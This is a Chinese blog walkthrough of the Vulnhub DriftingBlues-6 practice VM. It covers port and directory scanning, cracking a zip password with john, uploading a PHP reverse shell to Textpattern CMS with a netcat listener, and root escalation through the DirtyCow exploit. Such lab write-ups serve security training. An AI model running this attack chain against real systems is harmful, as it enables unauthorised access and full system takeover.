靶机渗透练习Vulnhub DriftingBlues-6

已于 2022-09-25 12:31:14 修改
阅读量1.3k 收藏
点赞数
文章标签: php 安全 网络 web安全
于 2022-09-25 12:27:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/127036316
版权

攻击机ip

192.168.159.88

扫描主机

arp-scan -I eth0 -l

 得到靶机ip:

192.168.159.144

扫描端口

nmap -sS -A -sV -T4 -p- 192.168.159.144

 访问网页

192.168.159.144

 没发现什么有用的信息

目录扫描

 使用dirb发现了robots.txt和/textpattern/textpattern

dirb 192.168.159.144

扫描网站的后台 发现了robots.txt ,访问

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台

进入后台,访问

http://192.168.159.144/textpattern/textpattern/

但是我们没有账号和密码

使用工具gobuster寻找后缀为zip的目录

安装工具gobuster

apt-get install gobuster

安装seclists字典:

apt-get install seclists

扫描目录

gobuster dir -u “192.168.159.144” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

指纹识别出是Textpattern CMS

robots.txt中还有提示不要忘了zip,看到扫描结果中有 /spammer.zip,下载得到一个压缩包,尝试打开发现有密码

gobuster dir -u http://192.168.159.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

 访问

http://192.168.159.144/spammer.zip

得到一个有密码的zip文件

使用kali破解zip压缩包密码

 1.使用zip2john爆破得到zip密码

zip2john spammer.zip > password.txt

2.使用john破解

john password.txt

 得到密码

myspace4

解压zip文件

得到了一个用户名和密码

mayer:lionheart

用这个用户名和密码登入之前的网址

http://192.168.159.144/textpattern/textpattern/

进去后看到cms的版本是4.8.3

 思路一:kali本地搜索漏洞

searchsploit textpattern 4.8.3

 查看49620.py详细信息与使用方法

searchsploit -x php/webapps/49620.py

python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

输入命令

因为回看脚本,他会自己给你加一个testpattern,所以url参数就不用加那么多textpattern了

python3 48943.py http://192.168.159.144/textpattern mayer lionheart

发现还是报错,用不了

思路二:寻找网站内的漏洞

在content那发现存在文件上传

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php,上传前需要修ip和port 分别为攻击机ip和攻击机监听的tcp端口。

cd /usr/share/webshells/php

修改php

上传shell

 监听1234端口

nc -nlvp 1234

上传webshell

我们在admin管理界面可以看到上传地址 

访问

http://192.168.159.144/textpattern/files

 点击php-reverse-shell.php

回到kali已经监听成功

获得交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

脏牛提权

查看linux的版本信息

uname -a

内核版本>= 2.6.22 , 尝试脏牛提权

在github上下载提权脚本

https://github.com/FireFart/dirtycow

然后通过网站的文件上传漏洞解压后上传至后台

进入上传文件的文件夹

cd  /var/www/textpattern/files

进行编译,生成一个dirty的可执行文件

gcc -pthread dirty.c -o dirty -lcrypt

执行文件

./dirty

然后会让我们输入一个密码

 然后我们可以用用户名:firefart 密码:root

进入一个有root权限的用户

切换用户

su firefart

进入/root

cd /root

 得到flag.txt

参考文章

http://t.csdn.cn/nvjQG
http://t.csdn.cn/Jp7Ku
https://github.com/FireFart/dirtycow

墨言ink
关注
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2005
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3714
前言 这次练习靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-6
Aluxian_的博客
03-20 2136
Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:开始目录爆破:③:暴力破解zip:③:上传WebShell:④:脏牛提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/ Vulnhub靶机漏洞详解: ①:信息收集: kali里使用net
driftingblues6靶机(脏牛漏洞)
m0_66299232的博客
01-04 644
这段英文的意思是,警告“strftime():依赖系统的时区设置是不安全的。如果您使用了这些方法中的任何一种,并且仍然收到此警告,您很可能拼写错误了时区标识符。我们现在选择了时区“UTC”,但请设置date.timezone以选择您的时区。5.用unzip解压发现需要密码,那我们用fcrackzip,暴力破解。然后又改了密码,改完之后好像这个交互式界面又不能用了,也许命令在执行中。8.发现content下面的files能上传文件,上传我们的木马。6.正当我要上传dirty.c时,我的交互式界面不能用了。
靶机渗透练习06-driftingblues6
hirak0的博客
04-14 766
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-5,662/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
dirtycow(脏牛提权)靶机渗透测试
yqa957的博客
03-12 2501
nmap扫描存活主机 nmap -sn 192.168.233.0/24 发现靶机192.168.233.133 扫描端口 nmap -sV -sC -sT -p- 192.168.233.133 御剑扫描 注入测试 手工注入—>确定注入点 判断列数 使用union all 手工注 查找对应位置 http://192.168.233.133/storypage_04.php?id=...
什么是.ink 域名?.ink 域名有什么价值优势?
老刀专栏
11-21 3614
现在域名的种类比较多,很多人在注册域名时不知道怎么去选择,经常有人咨询我们:.ink 域名是否值得注册。什么是.ink 域名?.ink 域名有什么价值优势?下面大家就来看看文章一起了解下吧。 一、什么是.ink域名? .ink是国际新通用顶级域名(New Generic Top-level Domain 简称 New gTLD) 。目前GOOGLE、微软、百度、苹果等国际知名企业已入驻保护。ink英文释义为“墨水”“签名(签订合同)”,以其为后缀的单词有think·思考,pink·顶点、极度、典范,blin
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 724
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub-DriftingBlues-7
weixin_50342860的博客
08-16 457
@TOC 简介 靶机下载:DriftingBlue-7 运行环境: 攻击机:kali 受害机:DriftingBlues-7 目标:夺到里面的flag 下载好靶机,直接打开(这里使用的是VM,模式选择NAT),如图 信息收集 扫描当前网段存活主机 查看端口及运行服务 查看服务版本 目录扫描 dirsearch 安装方法:点这里 扫描出来的目录没啥大发现 发现漏洞及利用漏洞 访问80端口会被跳转到如下页面 尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。
kali中john破解压缩包密码
weixin_55631415的博客
12-29 2988
zip2john [选项] zip文件 > hash。2.john破解中间Hash文件。
[代码审计]Textpattern4.8.4任意文件上传漏洞
Y4tacker的博客
04-25 704
在网上看到的公开不久,自己无聊随意进行分析一下啦 利用点在后台上传插件的地方 从这里跟踪发现其调用了plugin_upload函数 照顾小白加一点批注吧 function plugin_upload() { $plugin = array(); if ($_FILES["theplugin"]["name"]) { //获取上传表单 $filename = $_FILES["theplugin"]["name"]; $source = $_FIL
DirtyCow(脏牛)漏洞复现
热门推荐
Brucetg的博客
08-20 2万+
该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521 这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。 编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子...
Vulnhub靶机driftingblues6_vh
weixin_43967893的博客
04-19 737
Vulnhub_driftingblues6 zip破解,php_reverse,脏牛提权
靶机渗透练习06-driftingblues6 (利用脏牛提权)
Force~
03-29 1459
靶机地址: https://www.vulnhub.com/entry/driftingblues-6,672/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
TextpatternCMS后台未过滤直接上传php导致getshell
云雕的博客
06-18 545
该漏洞CNVD-ID: CNVD-2019-12539 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53 产品官网:https://textpattern.com/ github: https://github.com/textpattern/textpat...
TextpatternCMS安装插件时可以安装后门导致getshell
云雕的博客
06-20 1339
该漏洞CNVD-ID: CNVD-2019-12530 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53 产品官网:https://textpattern.com/ github: https://github.com/textpattern/textpatt...
vulnhub靶机-jangow: 1.0.1
最新发布
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值